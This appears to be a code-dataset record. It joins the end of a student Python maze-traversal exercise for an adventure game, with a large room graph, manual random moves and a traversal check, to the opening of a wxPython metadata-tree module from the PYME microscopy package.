177, 'w': 220}], 243: [(6, 12), {'s': 215}], 260: [(6, 13), {'n': 226, 'w': 266}], 226: [(6, 14), {'s': 260, 'e': 225}], 222: [(6, 15), {'e': 190, 'w': 274}], 205: [(6, 16), {'e': 162, 'w': 254}], 194: [(6, 17), {'e': 128, 'w': 227}], 167: [(6, 18), {'e': 108, 'w': 187}], 171: [(6, 19), {'e': 168}], 297: [(6, 20), {'e': 207}], 342: [(6, 21), {'e': 221, 'w': 357}], 289: [(6, 22), {'n': 319, 'e': 250, 'w': 324}], 319: [(6, 23), {'n': 441, 's': 289}], 441: [(6, 24), {'s': 319}], 453: [(6, 25), {'e': 351}], 395: [(7, 6), {'n': 362, 'w': 423}], 362: [(7, 7), {'n': 327, 's': 395, 'w': 469}], 327: [(7, 8), {'s': 362, 'e': 256}], 217: [(7, 9), {'n': 213, 'w': 271}], 213: [(7, 10), {'s': 217, 'e': 209, 'w': 216}], 177: [(7, 11), {'e': 156, 'w': 215}], 180: [(7, 12), {'e': 164}], 235: [(7, 13), {'e': 158}], 225: [(7, 14), {'e': 105, 'w': 226}], 190: [(7, 15), {'e': 129, 'w': 222}], 162: [(7, 16), {'n': 128, 'w': 205}], 128: [(7, 17), {'s': 162, 'e': 92, 'w': 194}], 108: [(7, 18), {'e': 81, 'w': 167}], 168: [(7, 19), {'n': 207, 'e': 137, 'w': 171}], 207: [(7, 20), {'s': 168, 'w': 297}], 221: [(7, 21), {'n': 250, 'e': 174, 'w': 342}], 250: [(7, 22), {'n': 295, 's': 221, 'w': 289}], 295: [(7, 23), {'n': 332, 's': 250}], 332: [(7, 24), {'n': 351, 's': 295}], 351: [(7, 25), {'n': 417, 's': 332, 'w': 453}], 417: [(7, 26), {'n': 442, 's': 351}], 442: [(7, 27), {'s': 417}], 410: [(8, 5), {'e': 406}], 323: [(8, 6), {'n': 279}], 279: [(8, 7), {'n': 256, 's': 323}], 256: [(8, 8), {'n': 241, 's': 279, 'w': 327}], 241: [(8, 9), {'s': 256, 'e': 193}], 209: [(8, 10), {'n': 156, 'w': 213}], 156: [(8, 11), {'s': 209, 'e': 149, 'w': 177}], 164: [(8, 12), {'n': 158, 'w': 180}], 158: [(8, 13), {'s': 164, 'e': 126, 'w': 235}], 105: [(8, 14), {'n': 129, 'e': 104, 'w': 225}], 129: [(8, 15), {'s': 105, 'w': 190}], 100: [(8, 16), {'n': 92}], 92: [(8, 17), {'n': 81, 's': 100, 'w': 128}], 81: [(8, 18), {'n': 137, 's': 92, 'e': 45, 'w': 108}], 137: [(8, 19), {'s': 81, 'w': 168}], 124: [(8, 20), {'n': 174, 'e': 112}], 174: [(8, 21), {'n': 277, 's': 124, 'w': 221}], 277: [(8, 22), {'n': 331, 's': 174}], 331: [(8, 23), {'n': 387, 's': 277}], 387: [(8, 24), {'n': 444, 's': 331}], 444: [(8, 25), {'s': 387}], 422: [(8, 26), {'n': 461, 'e': 394}], 461: [(8, 27), {'s': 422}], 406: [(9, 5), {'n': 315, 'w': 410}], 315: [(9, 6), {'n': 269, 's': 406, 'e': 335}], 269: [(9, 7), {'n': 203, 's': 315}], 203: [(9, 8), {'n': 193, 's': 269}], 193: [(9, 9), {'n': 191, 's': 203, 'w': 241}], 191: [(9, 10), {'n': 149, 's': 193}], 149: [(9, 11), {'n': 135, 's': 191, 'w': 156}], 135: [(9, 12), {'n': 126, 's': 149}], 126: [(9, 13), {'n': 104, 's': 135, 'w': 158}], 104: [(9, 14), {'n': 89, 's': 126, 'w': 105}], 89: [(9, 15), {'n': 72, 's': 104}], 72: [(9, 16), {'n': 69, 's': 89}], 69: [(9, 17), {'s': 72, 'e': 41}], 45: [(9, 18), {'n': 85, 'e': 40, 'w': 81}], 85: [(9, 19), {'s': 45}], 112: [(9, 20), {'n': 210, 'e': 106, 'w': 124}], 210: [(9, 21), {'s': 112}], 208: [(9, 22), {'n': 307, 'e': 166}], 307: [(9, 23), {'s': 208}], 341: [(9, 24), {'e': 316}], 374: [(9, 25), {'e': 340}], 394: [(9, 26), {'n': 426, 'e': 318, 'w': 422}], 426: [(9, 27), {'s': 394}], 477: [(9, 29), {'e': 443}], 485: [(10, 3), {'e': 481}], 346: [(10, 5), {'n': 335}], 335: [(10, 6), {'s': 346, 'e': 378, 'w': 315}], 369: [(10, 7), {'n': 247}], 247: [(10, 8), {'s': 369, 'e': 234}], 151: [(10, 9), {'n': 188, 'e': 133}], 188: [(10, 10), {'s': 151}], 183: [(10, 11), {'n': 145}], 145: [(10, 12), {'s': 183, 'e': 113}], 122: [(10, 13), {'n': 99}], 99: [(10, 14), {'n': 83, 's': 122}], 83: [(10, 15), {'s': 99, 'e': 80}], 76: [(10, 16), {'n': 41}], 41: [(10, 17), {'s': 76, 'e': 36, 'w': 69}], 40: [(10, 18), {'n': 74, 'e': 19, 'w': 45}], 74: [(10, 19), {'s': 40}], 106: [(10, 20), {'n': 161, 'e': 79, 'w': 112}], 161: [(10, 21), {'n': 166, 's': 106}], 166: [(10, 22), {'s': 161, 'w': 208}], 292: [(10, 23), {'n': 316, 'e': 185}], 316: [(10, 24), {'s': 292, 'w': 341}], 340: [(10, 25), {'n': 318, 'w': 374}], 318: [(10, 26), {'s': 340, 'e': 199, 'w': 394}], 392: [(10, 27), {'n': 408, 'e': 281}], 408: [(10, 28), {'n': 443, 's': 392}], 443: [(10, 29), {'s': 408, 'w': 477}], 481: [(11, 3), {'n': 472, 'w': 485}], 472: [(11, 4), {'n': 466, 's': 481, 'e': 495}], 466: [(11, 5), {'n': 378, 's': 472}], 378: [(11, 6), {'s': 466, 'w': 335}], 280: [(11, 7), {'n': 234}], 234: [(11, 8), {'n': 133, 's': 280, 'e': 259, 'w': 247}], 133: [(11, 9), {'s': 234, 'e': 118, 'w': 151}], 157: [(11, 10), {'e': 110}], 153: [(11, 11), {'e': 97}], 113: [(11, 12), {'e': 94, 'w': 145}], 68: [(11, 13), {'e': 57}], 58: [(11, 14), {'e': 23}], 80: [(11, 15), {'n': 11, 'w': 83}], 11: [(11, 16), {'s': 80, 'e': 3}], 36: [(11, 17), {'e': 21, 'w': 41}], 19: [(11, 18), {'n': 32, 'e': 15, 'w': 40}], 32: [(11, 19), {'s': 19}], 79: [(11, 20), {'e': 46, 'w': 106}], 63: [(11, 21), {'n': 140, 'e': 61}], 140: [(11, 22), {'s': 63}], 185: [(11, 23), {'n': 195, 'e': 155, 'w': 292}], 195: [(11, 24), {'s': 185}], 328: [(11, 25), {'e': 200}], 199: [(11, 26), {'n': 281, 'e': 197, 'w': 318}], 281: [(11, 27), {'n': 350, 's': 199, 'w': 392}], 350: [(11, 28), {'n': 425, 's': 281}], 425: [(11, 29), {'n': 434, 's': 350}], 434: [(11, 30), {'s': 425}], 495: [(12, 4), {'w': 472}], 415: [(12, 5), {'n': 306}], 306: [(12, 6), {'n': 291, 's': 415}], 291: [(12, 7), {'n': 259, 's': 306}], 259: [(12, 8), {'s': 291, 'w': 234}], 118: [(12, 9), {'n': 110, 'e': 218, 'w': 133}], 110: [(12, 10), {'n': 97, 's': 118, 'w': 157}], 97: [(12, 11), {'n': 94, 's': 110, 'w': 153}], 94: [(12, 12), {'n': 57, 's': 97, 'w': 113}], 57: [(12, 13), {'n': 23, 's': 94, 'w': 68}], 23: [(12, 14), {'s': 57, 'e': 6, 'w': 58}], 16: [(12, 15), {'e': 8}], 3: [(12, 16), {'n': 21, 'e': 0, 'w': 11}], 21: [(12, 17), {'s': 3, 'w': 36}], 15: [(12, 18), {'e': 13, 'w': 19}], 47: [(12, 19), {'e': 14}], 46: [(12, 20), {'n': 61, 'e': 17, 'w': 79}], 61: [(12, 21), {'n': 82, 's': 46, 'w': 63}], 82: [(12, 22), {'n': 155, 's': 61}], 155: [(12, 23), {'s': 82, 'w': 185}], 175: [(12, 24), {'n': 200, 'e': 141}], 200: [(12, 25), {'s': 175, 'e': 204, 'w': 328}], 197: [(12, 26), {'e': 165, 'w': 199}], 223: [(12, 27), {'n': 483, 'e': 169}], 483: [(12, 28), {'s': 223}], 488: [(13, 4), {'n': 409}], 409: [(13, 5), {'n': 345, 's': 488}], 345: [(13, 6), {'n': 261, 's': 409}], 261: [(13, 7), {'n': 252, 's': 345}], 252: [(13, 8), {'n': 218, 's': 261}], 218: [(13, 9), {'n': 144, 's': 252, 'w': 118}], 144: [(13, 10), {'n': 134, 's': 218}], 134: [(13, 11), {'n': 65, 's': 144}], 65: [(13, 12), {'n': 62, 's': 134}], 62: [(13, 13), {'n': 6, 's': 65}], 6: [(13, 14), {'s': 62, 'e': 5, 'w': 23}], 8: [(13, 15), {'n': 0, 'w': 16}], 0: [(13, 16), {'n': 4, 's': 8, 'e': 1, 'w': 3}], 4: [(13, 17), {'s': 0}], 13: [(13, 18), {'n': 14, 'e': 9, 'w': 15}], 14: [(13, 19), {'n': 17, 's': 13, 'w': 47}], 17: [(13, 20), {'n': 33, 's': 14, 'e': 28, 'w': 46}], 33: [(13, 21), {'s': 17}], 102: [(13, 22), {'n': 107, 'e': 64}], 107: [(13, 23), {'n': 141, 's': 102}], 141: [(13, 24), {'s': 107, 'w': 175}], 204: [(13, 25), {'w': 200}], 165: [(13, 26), {'n': 169, 'e': 163, 'w': 197}], 169: [(13, 27), {'n': 385, 's': 165, 'w': 223}], 385: [(13, 28), {'s': 169}], 497: [(13, 30), {'e': 366}], 424: [(14, 4), {'n': 322}], 322: [(14, 5), {'s': 424, 'e': 276}], 290: [(14, 6), {'n': 264}], 264: [(14, 7), {'n': 244, 's': 290}], 244: [(14, 8), {'s': 264, 'e': 232}], 181: [(14, 9), {'n': 179}], 179: [(14, 10), {'n': 96, 's': 181, 'e': 201}], 96: [(14, 11), {'n': 66, 's': 179}], 66: [(14, 12), {'n': 50, 's': 96}], 50: [(14, 13), {'n': 5, 's': 66, 'e': 70}], 5: [(14, 14), {'n': 2, 's': 50, 'w': 6}], 2: [(14, 15), {'n': 1, 's': 5, 'e': 10}], 1: [(14, 16), {'n': 7, 's': 2, 'e': 22, 'w': 0}], 7: [(14, 17), {'n': 9, 's': 1, 'e': 12}], 9: [(14, 18), {'s': 7, 'w': 13}], 30: [(14, 19), {'n': 28}], 28: [(14, 20), {'n': 60, 's': 30, 'w': 17}], 60: [(14, 21), {'n': 64, 's': 28}], 64: [(14, 22), {'n': 111, 's': 60, 'w': 102}], 111: [(14, 23), {'n': 121, 's': 64, 'e': 114}], 121: [(14, 24), {'n': 148, 's': 111, 'e': 123}], 148: [(14, 25), {'n': 163, 's': 121, 'e': 178}], 163: [(14, 26), {'n': 257, 's': 148, 'e': 228, 'w': 165}], 257: [(14, 27), {'n': 388, 's': 163}], 388: [(14, 28), {'s': 257, 'n': 386}], 386: [(14, 29), {'e': 354, 's': 388}], 366: [(14, 30), {'e': 361, 'w': 497}], 467: [(15, 3), {'n': 459}], 459: [(15, 4), {'n': 276, 's': 467}], 276: [(15, 5), {'n': 268, 's': 459, 'w': 322}], 268: [(15, 6), {'n': 265, 's': 276}], 265: [(15, 7), {'n': 232, 's': 268, 'e': 273}], 232: [(15, 8), {'n': 206, 's': 265, 'w': 244}], 206: [(15, 9), {'n': 201, 's': 232}], 201: [(15, 10), {'s': 206, 'w': 179}], 159: [(15, 11), {'n': 116}], 116: [(15, 12), {'n': 70, 's': 159}], 70: [(15, 13), {'s': 116, 'e': 87, 'w': 50}], 38: [(15, 14), {'n': 10}], 10: [(15, 15), {'s': 38, 'w': 2}], 22: [(15, 16), {'w': 1}], 12: [(15, 17), {'n': 20, 'e': 18, 'w': 7}], 20: [(15, 18), {'n': 31, 's': 12, 'e': 26}], 31: [(15, 19), {'n': 37, 's': 20}], 37: [(15, 20), {'n': 91, 's': 31, 'e': 42}], 91: [(15, 21), {'n': 101, 's': 37}], 101: [(15, 22), {'s': 91}], 114: [(15, 23), {'e': 120, 'w': 111}], 123: [(15, 24), {'e': 138, 'w': 121}], 178: [(15, 25), {'w': 148}], 228: [(15, 26), {'n': 253, 'w': 163}], 253: [(15, 27), {'n': 285, 's': 228}], 285: [(15, 28), {'s': 253}], 354: [(15, 29), {'n': 361, 'e': 321, 'w': 386}], 361: [(15, 30), {'s': 354, 'w': 366}], 455: [(16, 4), {'n': 382}], 382: [(16, 5), {'n': 296, 's': 455}], 296: [(16, 6), {'n': 273, 's': 382, 'e': 308}], 273: [(16, 7), {'s': 296, 'e': 298, 'w': 265}], 237: [(16, 8), {'n': 229, 'e': 370}], 229: [(16, 9), {'n': 212, 's': 237}], 212: [(16, 10), {'n': 127, 's': 229}], 127: [(16, 11), {'n': 117, 's': 212, 'e': 173}], 117: [(16, 12), {'n': 87, 's': 127, 'e': 170}], 87: [(16, 13), {'s': 117, 'w': 70}], 54: [(16, 14), {'n': 29}], 29: [(16, 15), {'n': 24, 's': 54}], 24: [(16, 16), {'n': 18, 's': 29, 'e': 25}], 18: [(16, 17), {'s': 24, 'e': 34, 'w': 12}], 26: [(16, 18), {'n': 27, 'w': 20}], 27: [(16, 19), {'s': 26, 'e': 55}], 42: [(16, 20), {'n': 51, 'w': 37}], 51: [(16, 21), {'n': 93, 's': 42}], 93: [(16, 22), {'s': 51}], 120: [(16, 23), {'w': 114}], 138: [(16, 24), {'n': 143, 'e': 139, 'w': 123}], 143: [(16, 25), {'s': 138}], 233: [(16, 26), {'n': 240, 'e': 152}], 240: [(16, 27), {'n': 304, 's': 233}], 304: [(16, 28), {'n': 321, 's': 240}], 321: [(16, 29), {'n': 334, 's': 304, 'w': 354}], 334: [(16, 30), {'s': 321, 'e': 384}], 416: [(17, 4), {'n': 317}], 317: [(17, 5), {'n': 308, 's': 416}], 308: [(17, 6), {'s': 317, 'e': 337, 'w': 296}], 298: [(17, 7), {'e': 360, 'w': 273}], 370: [(17, 8), {'w': 237}], 267: [(17, 9), {'n': 202, 'e': 302}], 202: [(17, 10), {'n': 173, 's': 267, 'e': 249}], 173: [(17, 11), {'s': 202, 'w': 127}], 170: [(17, 12), {'n': 182, 'w': 117}], 182: [(17, 13), {'s': 170, 'e': 211}], 77: [(17, 14), {'n': 43, 'e': 130}], 43: [(17, 15), {'n': 25, 's': 77, 'e': 49}], 25: [(17, 16), {'s': 43, 'w': 24}], 34: [(17, 17), {'n': 35, 'e': 39, 'w': 18}], 35: [(17, 18), {'s': 34, 'e': 44}], 55: [(17, 19), {'n': 56, 'w': 27}], 56: [(17, 20), {'n': 73, 's': 55, 'e': 67}], 73: [(17, 21), {'n': 132, 's': 56}], 132: [(17, 22), {'n': 172, 's': 73}], 172: [(17, 23), {'s': 132}], 139: [(17, 24), {'n': 147, 'e': 176, 'w': 138}], 147: [(17, 25), {'n': 152, 's': 139, 'e': 154}], 152: [(17, 26), {'n': 196, 's': 147, 'w': 233}], 196: [(17, 27), {'n': 278, 's': 152, 'e': 224}], 278: [(17, 28), {'n': 338, 's': 196}], 338: [(17, 29), {'s': 278}], 384: [(17, 30), {'e': 435, 'w': 334}], 460: [(18, 4), {'n': 383}], 383: [(18, 5), {'n': 337, 's': 460}], 337: [(18, 6), {'s': 383, 'w': 308}], 360: [(18, 7), {'n': 364, 'w': 298}], 364: [(18, 8), {'s': 360, 'e': 401}], 302: [(18, 9), {'e': 402, 'w': 267}], 249: [(18, 10), {'w': 202}], 272: [(18, 11), {'n': 248}], 248: [(18, 12), {'n': 211, 's': 272}], 211: [(18, 13), {'s': 248, 'w': 182}], 130: [(18, 14), {'w': 77}], 49: [(18, 15), {'e': 119, 'w': 43}], 52: [(18, 16), {'n': 39}], 39: [(18, 17), {'s': 52, 'e': 71, 'w': 34}], 44: [(18, 18), {'n': 48, 'e': 59, 'w': 35}], 48: [(18, 19), {'s': 44, 'e': 53}], 67: [(18, 20), {'n': 84, 'w': 56}], 84: [(18, 21), {'n': 86, 's': 67}], 86: [(18, 22), {'n': 146, 's': 84, 'e': 95}], 146: [(18, 23), {'s': 86}], 176: [(18, 24), {'w': 139}], 154: [(18, 25), {'n': 192, 'e': 184, 'w': 147}], 192: [(18, 26), {'s': 154, 'e': 239}], 224: [(18, 27), {'n': 287, 'w': 196}], 287: [(18, 28), {'n': 313, 's': 224, 'e': 353}], 313: [(18, 29), {'s': 287}], 435: [(18, 30), {'w': 384}], 464: [(19, 6), {'n': 420}], 420: [(19, 7), {'n': 401, 's': 464}], 401: [(19, 8), {'s': 420, 'e': 427, 'w': 364}], 402: [(19, 9), {'e': 403, 'w': 302}], 371: [(19, 10), {'n': 309, 'e': 430}], 309: [(19, 11), {'n': 286, 's': 371, 'e': 377}], 286: [(19, 12), {'n': 242, 's': 309, 'e': 288}], 242: [(19, 13), {'n': 219, 's': 286}], 219: [(19, 14), {'n': 119, 's': 242, 'e': 305}], 119: [(19, 15), {'s': 219, 'e': 131, 'w': 49}], 115: [(19, 16), {'n': 71, 'e': 160}], 71: [(19, 17), {'s': 115, 'e': 150, 'w': 39}], 59: [(19, 18), {'e': 189, 'w': 44}], 53: [(19, 19), {'n': 75, 'w': 48}], 75: [(19, 20), {'n': 78, 's': 53, 'e': 88}], 78: [(19, 21), {'s': 75, 'e': 90}], 95: [(19, 22), {'n': 109, 'w': 86}], 109: [(19, 23), {'n': 136, 's': 95}], 136: [(19, 24), {'s': 109, 'e': 231}], 184: [(19, 25), {'w': 154}], 239: [(19, 26), {'n': 255, 'e': 336, 'w': 192}], 255: [(19, 27), {'s': 239}], 353: [(19, 28), {'n': 380, 'w': 287}], 380: [(19, 29), {'n': 476, 's': 353, 'e': 445}], 476: [(19, 30), {'s': 380}], 496: [(20, 4), {'n': 475}], 475: [(20, 5), {'n': 448, 's': 496}], 448: [(20, 6), {'n': 438, 's': 475, 'e': 490}], 438: [(20, 7), {'n': 427, 's': 448}], 427: [(20, 8), {'s': 438, 'e': 474, 'w': 401}], 403: [(20, 9), {'e': 439, 'w': 402}], 430: [(20, 10), {'e': 440, 'w': 371}], 377: [(20, 11), {'e': 456, 'w': 309}], 288: [(20, 12), {'n': 326, 'e': 498, 'w': 286}], 326: [(20, 13), {'s': 288}], 305: [(20, 14), {'e': 330, 'w': 219}], 131: [(20, 15), {'e': 329, 'w': 119}], 160: [(20, 16), {'e': 214, 'w': 115}], 150: [(20, 17), {'e': 251, 'w': 71}], 189: [(20, 18), {'e': 275, 'w': 59}], 103: [(20, 19), {'n': 88}], 88: [(20, 20), {'s': 103, 'e': 125, 'w': 75}], 90: [(20, 21), {'n': 98, 'e': 142, 'w': 78}], 98: [(20, 22), {'n': 186, 's': 90}], 186: [(20, 23), {'s': 98, 'e': 262}], 231: [(20, 24), {'n': 282, 'e': 294, 'w': 136}], 282: [(20, 25), {'s': 231}], 336: [(20, 26), {'n': 373, 'e': 421, 'w': 239}], 373: [(20, 27), {'s': 336}], 480: [(20, 28), {'n': 445}], 445: [(20, 29), {'s': 480, 'e': 446, 'w': 380}], 490: [(21, 6), {'w': 448}], 474: [(21, 8), {'w': 427}], 439: [(21, 9), {'w': 403}], 440: [(21, 10), {'w': 430}], 456: [(21, 11), {'w': 377}], 498: [(21, 12), {'w': 288}], 348: [(21, 13), {'n': 330}], 330: [(21, 14), {'s': 348, 'e': 454, 'w': 305}], 329: [(21, 15), {'e': 407, 'w': 131}], 214: [(21, 16), {'e': 246, 'w': 160}], 251: [(21, 17), {'w': 150}], 275: [(21, 18), {'e': 283, 'w': 189}], 198: [(21, 19), {'n': 125, 'e': 270}], 125: [(21, 20), {'s': 198, 'e': 238, 'w': 88}], 142: [(21, 21), {'n': 245, 'w': 90}], 245: [(21, 22), {'s': 142, 'e': 343}], 262: [(21, 23), {'e': 390, 'w': 186}], 294: [(21, 24), {'n': 363, 'e': 311, 'w': 231}], 363: [(21, 25), {'s': 294}], 421: [(21, 26), {'w': 336}], 446: [(21, 29), {'w': 445}], 454: [(22, 14), {'w': 330}], 407: [(22, 15), {'w': 329}], 246: [(22, 16), {'n': 325, 'e': 412, 'w': 214}], 325: [(22, 17), {'s': 246}], 283: [(22, 18), {'e': 376, 'w': 275}], 270: [(22, 19), {'e': 300, 'w': 198}], 238: [(22, 20), {'n': 381, 'e': 293, 'w': 125}], 381: [(22, 21), {'s': 238, 'e': 431}], 343: [(22, 22), {'w': 245}], 390: [(22, 23), {'e': 398, 'w': 262}], 311: [(22, 24), {'n': 389, 'e': 499, 'w': 294}], 389: [(22, 25), {'s': 311}], 412: [(23, 16), {'w': 246}], 468: [(23, 17), {'n': 376}], 376: [(23, 18), {'s': 468, 'w': 283}], 300: [(23, 19), {'e': 320, 'w': 270}], 293: [(23, 20), {'w': 238}], 431: [(23, 21), {'w': 381}], 487: [(23, 22), {'n': 398}], 398: [(23, 23), {'s': 487, 'w': 390}], 499: [(23, 24), {'w': 311}], 471: [(24, 18), {'n': 320}], 320: [(24, 19), {'s': 471, 'w': 300}]}
world.loadGraph(roomGraph)
world.printRooms()
player = Player("Name", world.startingRoom)
# USEFUL COMMANDS
# player.currentRoom.id
# player.currentRoom.getExits()
# player.travel(direction)
traversalPath = []
previous_room_id = 0
previous_exit_move = 'NONE'
previous_exit_move_full = 'NONE'
room_entry_template = {'n': '?',
's': '?',
'e': '?',
'w': '?'}
def print_nested(val, nesting = -5):
if type(val) == dict:
print("")
nesting += 5
for k in val:
print(nesting * ' ', end='')
print(k, end=': ')
print_nested(val[k],nesting)
else:
print(val)
def get_full_direction(previous_exit_move):
if previous_exit_move == "n":
return "NORTH"
elif previous_exit_move == "s":
return "SOUTH"
elif previous_exit_move == "e":
return "EAST"
elif previous_exit_move == "w":
return "WEST"
def get_opposite_room_key_value(previous_exit_move):
if previous_exit_move == "n":
return "s"
elif previous_exit_move == "s":
return "n"
elif previous_exit_move == "e":
return "w"
elif previous_exit_move == "w":
return "e"
print("\n----------------------------------------------------------------")
print("\n************** WELCOME TO TICO'S ADVENTURE GAME! ***************\n")
print("----------------------------------------------------------------")
graph = {} # Creates our graph
graph[player.currentRoom.id] = room_entry_template
print("\n------------------CURRENT STATUS--------------------")
print("Previous Exit Move: \t\t\t", previous_exit_move_full)
print("Previous Room #: \t\t\t", previous_room_id)
print("Current Room #: \t\t\t", player.currentRoom.id)
print("\nTotal # of Exits: \t\t\t", len(player.currentRoom.getExits()))
print("Available Exits: ", player.currentRoom.getExits())
random_exit_array = random.sample(player.currentRoom.getExits(), 1)
random_exit_full = get_full_direction(random_exit_array[0])
print("Random Future Exit Move: \t\t", random_exit_full)
print("\nTotal # of Previous Moves: \t", len(traversalPath))
print("List of All Previous Moves: \n\t", traversalPath)
print("\nDictionary of Previously Visited Rooms:")
print_nested(graph)
print("\n------------------------------------------------------")
print("----------------------------------------------------------------\n\n")
previous_room_id = player.currentRoom.id # Sets ID of current room to previous_room_id BEFORE traveling
direction_to_travel = random_exit_array[0] # Sets randomly chosen exit direction to future direction_to_travel BEFORE traveling
direction_to_travel_full = get_full_direction(direction_to_travel)
previous_exit_move = direction_to_travel # Stores the previous move before player makes the move
previous_exit_move_full = get_full_direction(previous_exit_move)
player.travel(direction_to_travel) # Moves the player!
traversalPath.append(direction_to_travel) # Adds the player's RECENT move to the 'traversalPath'
print(f"\n--------------PLAYER MOVEMENT ALERT----------------")
print(f"\nYou just moved {direction_to_travel_full} from Room # {previous_room_id} to get to Room # {player.currentRoom.id}!\n")
graph[player.currentRoom.id] = room_entry_template # Creates a new 'room' entry for the current room
print("previous exit move: ", previous_exit_move)
graph[previous_room_id][get_opposite_room_key_value(previous_exit_move)] = player.currentRoom.id
print("previous exit move: ", previous_exit_move)
print("Current Room: ", player.currentRoom.id)
graph[player.currentRoom.id][direction_to_travel] = previous_room_id
print("------------------CURRENT STATUS--------------------")
print("Previous Exit Move: \t\t\t", previous_exit_move_full)
print("Previous Room #: \t\t\t", previous_room_id)
print("Current Room #: \t\t\t", player.currentRoom.id)
print("\nTotal # of Exits: \t\t\t", len(player.currentRoom.getExits()))
print("Available Exits: ", player.currentRoom.getExits())
random_exit_array = random.sample(player.currentRoom.getExits(), 1)
random_exit_full = get_full_direction(random_exit_array[0])
print("Random Future Exit Move: \t\t", random_exit_full)
print("\nTotal # of Previous Moves: \t", len(traversalPath))
print("List of All Previous Moves: \n\t", traversalPath)
print("\nDictionary of Previously Visited Rooms:")
print_nested(graph)
print("\n------------------------------------------------------")
print("----------------------------------------------------------------\n\n")
previous_room_id = player.currentRoom.id
direction_to_travel = random_exit_array[0]
direction_to_travel_full = get_full_direction(direction_to_travel)
previous_exit_move = direction_to_travel
previous_exit_move_full = get_full_direction(previous_exit_move)
player.travel(direction_to_travel)
traversalPath.append(direction_to_travel)
print(f"\n--------------PLAYER MOVEMENT ALERT----------------")
print(f"\nYou just moved {direction_to_travel_full} from Room # {previous_room_id} to get to Room # {player.currentRoom.id}!\n")
graph[player.currentRoom.id] = room_entry_template
graph[player.currentRoom.id][previous_exit_move] = previous_room_id
print("previous exit move: ", previous_exit_move)
graph[previous_room_id][get_opposite_room_key_value(previous_exit_move)] = player.currentRoom.id
print("previous exit move: ", previous_exit_move)
print("------------------CURRENT STATUS--------------------")
print("Previous Exit Move: \t\t\t", previous_exit_move_full)
print("Previous Room #: \t\t\t", previous_room_id)
print("Current Room #: \t\t\t", player.currentRoom.id)
print("\nTotal # of Exits: \t\t\t", len(player.currentRoom.getExits()))
print("Available Exits: ", player.currentRoom.getExits())
random_exit_array = random.sample(player.currentRoom.getExits(), 1)
random_exit_full = get_full_direction(random_exit_array[0])
print("Random Future Exit Move: \t\t", random_exit_full)
print("\nTotal # of Previous Moves: \t", len(traversalPath))
print("List of All Previous Moves: \n\t", traversalPath)
print("\nDictionary of Previously Visited Rooms:")
print_nested(graph)
print("\n------------------------------------------------------")
print("----------------------------------------------------------------\n\n")
previous_room_id = player.currentRoom.id
direction_to_travel = random_exit_array[0]
direction_to_travel_full = get_full_direction(direction_to_travel)
previous_exit_move = direction_to_travel
previous_exit_move_full = get_full_direction(previous_exit_move)
player.travel(direction_to_travel)
traversalPath.append(direction_to_travel)
print(f"\n--------------PLAYER MOVEMENT ALERT----------------")
print(f"\nYou just moved {direction_to_travel_full} from Room # {previous_room_id} to get to Room # {player.currentRoom.id}!\n")
graph[player.currentRoom.id] = room_entry_template
print("previous exit move: ", previous_exit_move)
graph[player.currentRoom.id][previous_exit_move] = previous_room_id
print("previous exit move: ", previous_exit_move)
graph[previous_room_id][get_opposite_room_key_value(previous_exit_move)] = player.currentRoom.id
print("------------------CURRENT STATUS--------------------")
print("Previous Exit Move: \t\t\t", previous_exit_move_full)
print("Previous Room #: \t\t\t", previous_room_id)
print("Current Room #: \t\t\t", player.currentRoom.id)
print("\nTotal # of Exits: \t\t\t", len(player.currentRoom.getExits()))
print("Available Exits: ", player.currentRoom.getExits())
random_exit_array = random.sample(player.currentRoom.getExits(), 1)
random_exit_full = get_full_direction(random_exit_array[0])
print("Random Future Exit Move: \t\t", random_exit_full)
print("\nTotal # of Previous Moves: \t", len(traversalPath))
print("List of All Previous Moves: \n\t", traversalPath)
print("\nDictionary of Previously Visited Rooms:")
print_nested(graph)
print("\n------------------------------------------------------")
print("----------------------------------------------------------------\n\n")
print("*************** DID THE TESTS PASS? ****************\n")
# TRAVERSAL TEST
visited_rooms = set()
player.currentRoom = world.startingRoom
visited_rooms.add(player.currentRoom)
for move in traversalPath:
player.travel(move)
visited_rooms.add(player.currentRoom)
if len(visited_rooms) == len(roomGraph):
print("YES!\n \nALL TESTS for 'traversalPath' PASSED: ")
print("---TOTAL moves: ", len(traversalPath))
print("---TOTAL rooms visited: ", len(visited_rooms))
print("Visited Rooms: ", visited_rooms)
else:
print("NOPE! INCOMPLETE TRAVERSAL!\n \nTESTS for 'traversalPath' FAILED:")
print(f"---TOTAL # of Unvisited Rooms:\t\t{len(roomGraph) - len(visited_rooms)}")
print("---Visited Rooms: \n", visited_rooms)
print("\n****************************************************\n")
#######
# UNCOMMENT TO WALK AROUND
#######
# player.currentRoom.printRoomDescription(player)
# while True:
# cmds = input("-> ").lower().split(" ")
# if cmds[0] in ["n", "s", "e", "w"]:
# player.travel(cmds[0], True)
# else:
# print("I did not understand that command.") | [
"ticotheps@gmail.com"
] | ticotheps@gmail.com |
b095a13c61d3f6d4f6323acdbd1670fda772230d | c39f999cae8825afe2cdf1518d93ba31bd4c0e95 | /PYME/Analysis/MetadataTree.py | f1e6c667de7c1ded19123a87ef1ea3dcca949267 | [] | no_license | WilliamRo/CLipPYME | 0b69860136a9b2533f2f29fc29408d7471cb934d | 6596167034c727ad7dad0a741dd59e0e48f6852a | refs/heads/master | 2023-05-11T09:50:58.605989 | 2023-05-09T02:17:47 | 2023-05-09T02:17:47 | 60,789,741 | 3 | 1 | null | 2016-06-17T08:52:44 | 2016-06-09T16:30:14 | Python | UTF-8 | Python | false | false | 16,153 | py | #!/usr/bin/python
##################
# MetadataTree.py
#
# Copyright David Baddeley, 2009
# d.baddeley@auckland.ac.nz
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##################
import wx
import wx.gizmos as gizmos
from PYME.Acquire.MetaDataHandler import NestedClassMDHandler
#----------------------------------------------------------------------------
#----------------------------------------------------------------------------
from bisect import bisect
class TextEditMixin:
"""
A mixin class that enables any text in any column of a
multi-column listctrl to be edited by clicking on the given row
and column. You close the text editor by hitting the ENTER key or
clicking somewhere else on the listctrl. You switch to the next
column by hiting TAB.
To use the mixin you have to include it in the class definition
and call the __init__ function::
class TestListCtrl(wx.ListCtrl, TextEditMixin):
